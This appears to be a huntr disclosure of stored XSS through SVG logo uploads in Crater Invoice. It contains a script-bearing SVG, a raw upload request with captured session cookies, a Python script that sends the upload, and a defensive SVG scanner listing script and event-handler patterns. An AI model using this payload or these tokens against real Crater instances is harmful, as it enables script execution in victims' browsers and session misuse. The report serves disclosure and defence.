huntr 563232B9-5A93-4F4D-8389-ED805B262EF1
History: Jan 16, 2022 - 11:58 p.m.
Cross-site Scripting (XSS) - Stored in crater-invoice/crater

Date: 2022-01-16 23:58:29
Source: www.huntr.dev
Tags: vulnerability, crater-invoice, upload avatar, svg files, javascript execution

EPSS: 0.001 (percentile 21.4%)

Description

The avatar/logo upload functionality of Crater Invoice accepts .svg files without rejecting or stripping embedded script, so an attacker with an account can upload an SVG that carries JavaScript. All that is required is that a victim browse directly to the URL of the uploaded .svg file. The proof of concept below uses the company logo upload endpoint, /api/v1/company/upload-logo.

Proof of Concept

xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("svg xss");
   </script>
</svg>

Request:

POST /api/v1/company/upload-logo HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
company: 2
X-XSRF-TOKEN: eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------202251926415456929271193356967
Content-Length: 735
Origin: https://demo.craterapp.com
DNT: 1
Connection: keep-alive
Referer: https://demo.craterapp.com/admin/settings/company-info
Cookie: __stripe_mid=7d4c8a79-b568-4a3b-a898-67c90bb47968edd571; __stripe_sid=1cf6fd84-0a75-41ee-af21-ad527c27e72ce39a5c; XSRF-TOKEN=eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJaTTJTc0E3eVZWWXhjT3BZYnJlSnc9PSIsInZhbHVlIjoiTU5jaFY5MTk4SWRRZEZYMC8zSDkxZDhLMHp0NklPU1RtQUE3dEkwRzByMGVVY3BBSG1TeUI5ZkhKRGJsWHhybThEeFNjREdyd295UmVBV0h1dVAzb3Z6U3JiZ0ErNUtPTnRYMlpBNnJXR0lWN2JObGtDKzJ0MVRMaDVpSzlKOFQiLCJtYWMiOiIxYTc1YmM3OWZiYTM4OTA3ZWIwZWU5NzA5NGIxYzRkMGM2MGJlNTI0NjcyZGQ3ZWVjNWIyMTQzMTFhOGY5NjY4IiwidGFnIjoiIn0%3D; kQ8ZSOBtOqtWUFzuaiCYX7I5LKHRDCE3lwldiGew=
Sec-GPC: 1

-----------------------------202251926415456929271193356967
Content-Disposition: form-data; name="company_logo"

{"name":"xss.svg","data":"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgo8c3ZnIHZlcnNpb249IjEuMSIgYmFzZVByb2ZpbGU9ImZ1bGwiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICBhbGVydCgic3ZnIHhzcyIpOwogICA8L3NjcmlwdD4KPC9zdmc+Cg=="}
-----------------------------202251926415456929271193356967--

Response:

{"success":true}
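The request above, rebuilt as an added Python example (it is not part of the original report and not Crater's code). It encodes the file exactly as the PoC does: a multipart field named company_logo whose value is a JSON object carrying a base64 data URI, not a conventional file part. The base URL, company id, cookie values and the send_upload helper are placeholders for illustration; the X-XSRF-TOKEN header is the URL-decoded XSRF-TOKEN cookie value (the capture shows %3D in the cookie and = in the header).

```python
import base64
import json
import urllib.parse
import urllib.request

# Constructed copy of the xss.svg file from the report (same whitespace, so
# it base64-encodes to the value seen in the captured request).
XSS_SVG = (
    '<?xml version="1.0" standalone="no"?>\n'
    '<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
    '"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n'
    '<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">\n'
    '   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>\n'
    '   <script type="text/javascript">\n'
    '      alert("svg xss");\n'
    '   </script>\n'
    '</svg>\n'
)

UPLOAD_PATH = "/api/v1/company/upload-logo"


def logo_field_value(filename, svg):
    """Value of the company_logo form field as the PoC sends it: a JSON object
    whose "data" member is a base64 data URI of the file."""
    b64 = base64.b64encode(svg.encode("utf-8")).decode("ascii")
    return json.dumps(
        {"name": filename, "data": "data:image/svg+xml;base64," + b64},
        separators=(",", ":"),
    )


def multipart_body(boundary, fields):
    """Encode plain text fields as multipart/form-data (CRLF line endings)."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\n'
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f'{value}\r\n'
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode("utf-8")


def build_upload(base_url, company_id, xsrf_cookie, session_cookie, svg, filename="xss.svg"):
    """Return (url, headers, body) for the logo upload. The XSRF-TOKEN cookie
    stays URL-encoded; the X-XSRF-TOKEN header carries its decoded form."""
    boundary = "----pocboundary7d1"  # assumption: any token absent from the body
    body = multipart_body(boundary, {"company_logo": logo_field_value(filename, svg)})
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "X-Requested-With": "XMLHttpRequest",
        "company": str(company_id),
        "X-XSRF-TOKEN": urllib.parse.unquote(xsrf_cookie),
        "Cookie": f"XSRF-TOKEN={xsrf_cookie}; laravel_session={session_cookie}",
    }
    return base_url.rstrip("/") + UPLOAD_PATH, headers, body


def send_upload(url, headers, body):
    """POST the prepared request and return the decoded JSON response."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read().decode("utf-8"))


if __name__ == "__main__":
    # Placeholder values; run only against an instance you are authorised to test.
    url, headers, body = build_upload(
        "https://crater.example.test", 2, "XSRF_COOKIE_VALUE%3D", "SESSION_COOKIE_VALUE", XSS_SVG
    )
    print(send_upload(url, headers, body))
```

Because the file travels inside a JSON string rather than as a file part, any server-side check keyed on the multipart part's filename or Content-Type never sees it; validation has to happen after the data URI is decoded.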

Impact

This vulnerability allows JavaScript execution in the victim's browser. An attacker uploads an .svg file with JavaScript embedded in it; whenever a user visits the link to that file, the script runs. Script inside an SVG executes only when the file is opened as a document (direct navigation, or embedding via iframe/object), not when it is referenced from an <img> tag, which is why the trigger is the victim browsing to the file's URL.
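A server-side check of the kind that would have blocked this upload, as an added Python example that is not Crater's code. It parses the SVG as XML and rejects script elements, event-handler attributes, javascript: URLs and foreignObject, and it shows the response headers an upload-serving endpoint can add so that an SVG which slips through cannot run script when navigated to directly. The sample documents are constructed for the example; the standard library xml.etree is used for readability, and the assumption is that production code parsing untrusted XML would use a hardened parser such as defusedxml.

```python
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that let an SVG document run script or embed other content.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed"}
# Attributes that carry a URL and so can smuggle a javascript: scheme.
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
SCRIPT_SCHEMES = {"javascript", "vbscript"}


def _local(qname):
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1]


def scan_svg(data):
    """Return the reasons an uploaded SVG must be rejected (empty list = clean).
    expat does not fetch the external DTD the PoC references, but for
    untrusted input a hardened parser (defusedxml) is the safer choice."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if _local(root.tag).lower() != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for elem in root.iter():
        tag = _local(elem.tag).lower()
        if tag in ACTIVE_ELEMENTS:
            findings.append("<%s> element" % tag)
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                findings.append("event handler attribute %s on <%s>" % (name, tag))
            elif attr in URL_ATTRS:
                scheme = value.strip().lower().split(":", 1)[0]
                if scheme in SCRIPT_SCHEMES:
                    findings.append("%s: URL in %s on <%s>" % (scheme, name, tag))
    return findings


def upload_response_headers(content_type):
    """Headers for serving a stored upload. For SVG: force a download on direct
    navigation (an <img> reference still renders) and add a CSP that forbids
    script if the file is ever opened in a document context."""
    headers = {"Content-Type": content_type, "X-Content-Type-Options": "nosniff"}
    if content_type == "image/svg+xml":
        headers["Content-Disposition"] = "attachment"
        headers["Content-Security-Policy"] = "default-src 'none'; style-src 'unsafe-inline'; sandbox"
    return headers


# Constructed samples: the report's PoC (script element) plus variants a scanner must catch.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">alert("svg xss");</script>
</svg>
"""
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>'
XLINK_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
             b'<a xlink:href=" JavaScript:alert(1)"><text>x</text></a></svg>')
FOREIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject><div/></foreignObject></svg>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0" fill="#009900"/></svg>'

if __name__ == "__main__":
    for label, doc in [("poc", POC_SVG), ("onload", ONLOAD_SVG), ("xlink", XLINK_SVG),
                       ("foreignObject", FOREIGN_SVG), ("benign", BENIGN_SVG)]:
        print(label, scan_svg(doc) or "clean")
```

Rejecting at upload and hardening the serving headers are complementary: the scanner stops the file from being stored, and the attachment disposition plus CSP sandbox mean that a direct visit to a stored SVG cannot run script in the application's origin even if a future bypass gets one past the scanner.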

